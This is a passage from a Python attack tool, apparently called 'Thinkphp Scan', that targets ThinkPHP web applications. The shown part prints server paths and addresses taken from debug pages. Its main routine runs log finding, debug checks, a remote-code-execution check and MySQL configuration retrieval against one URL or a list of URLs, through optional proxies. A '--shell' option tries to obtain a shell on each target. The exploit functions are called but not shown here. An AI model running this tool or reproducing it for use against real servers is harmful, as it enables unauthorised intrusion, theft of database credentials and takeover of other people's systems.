ThinkPHP Version: {}\033[0m".format(j.small.text.strip())) 400 | if j.strong.text == 'DOCUMENT_ROOT': 401 | fo.write('DOCUMENT ROOT: {}\n'.format(j.small.text.strip())) 402 | print("\033[1;32m[+] DOCUMENT ROOT: {}\033[0m".format(j.small.text.strip())) 403 | if j.strong.text == 'SERVER_ADDR': 404 | fo.write('SERVER ADDR: {}\n'.format(j.small.text.strip())) 405 | print("\033[1;32m[+] SERVER ADDR: {}\033[0m".format(j.small.text.strip())) 406 | if j.strong.text == 'LOG_PATH': 407 | fo.write('LOG PATH: {}\n'.format(j.small.text.strip())) 408 | print("\033[1;32m[+] LOG PATH: {}\033[0m".format(j.small.text.strip())) 409 | elif div_html_3 and div_html_3_path: 410 | fo.write('ThinkPHP Version: {}\n'.format(div_html_3.text)) 411 | fo.write('ThinkPHP Path: {}\n'.format(div_html_3_path[0].p.text)) 412 | print("\033[1;32m[+] ThinkPHP Version: {}\033[0m".format(div_html_3.text)) 413 | print("\033[1;32m[+] ThinkPHP Path: {}\033[0m".format(div_html_3_path[0].p.text)) 414 | fo.close() 415 | 416 | 417 | def check_host(host): 418 | if not host.startswith("http"): 419 | print('\033[1;31m[x] ERROR: Host "{}" should start with http or https\n\033[0m'.format(host)) 420 | return False 421 | else: 422 | return True 423 | 424 | 425 | if __name__ == "__main__": 426 | parser = argparse.ArgumentParser(description='Thinkphp Scan') 427 | parser.add_argument( 428 | "-u", "--url", help='Start scanning url -u xxx.com') 429 | parser.add_argument("-f", "--file", help='read the url from the file') 430 | parser.add_argument("-p", "--proxy", help='use HTTP/HTTPS proxy') 431 | parser.add_argument("--shell", help='try to get shell', action='store_true') 432 | args = parser.parse_args() 433 | if args.url and check_host(args.url): 434 | if args.proxy: 435 | fo = open(args.proxy,'r') 436 | proxy = fo.readlines() 437 | fo.close() 438 | else: 439 | proxy = False 440 | print("\033[1;34m[!][!][!] 
{} Start\033[0m".format(args.url)) 441 | log_find(args.url) 442 | check_dubug(args.url) 443 | try: 444 | think_rce_check(args.url, proxy) 445 | except: 446 | pass 447 | get_mysql_conf(args.url) 448 | if args.shell: 449 | getshell(args.url, proxy) 450 | if args.file: 451 | f = open(args.file, "r") 452 | host = f.readlines() 453 | count = 0 454 | for i in host: 455 | if args.proxy: 456 | fo = open('proxy.txt','r') 457 | proxy = fo.readlines() 458 | fo.close() 459 | else: 460 | proxy = False 461 | url = i.strip('\n') 462 | print("\033[1;34m[!][!][!] {} Start\033[0m".format(url)) 463 | if check_host(url): 464 | log_find(url) 465 | check_dubug(url) 466 | try: 467 | think_rce_check(url, proxy) 468 | except: 469 | pass 470 | get_mysql_conf(url) 471 | if args.shell: 472 | getshell(url,proxy) 473 | count = count +1 474 | print("进度:{0}%".format(round(count * 100 / len(host))), end='\r') 475 | time.sleep(0.2) --------------------------------------------------------------------------------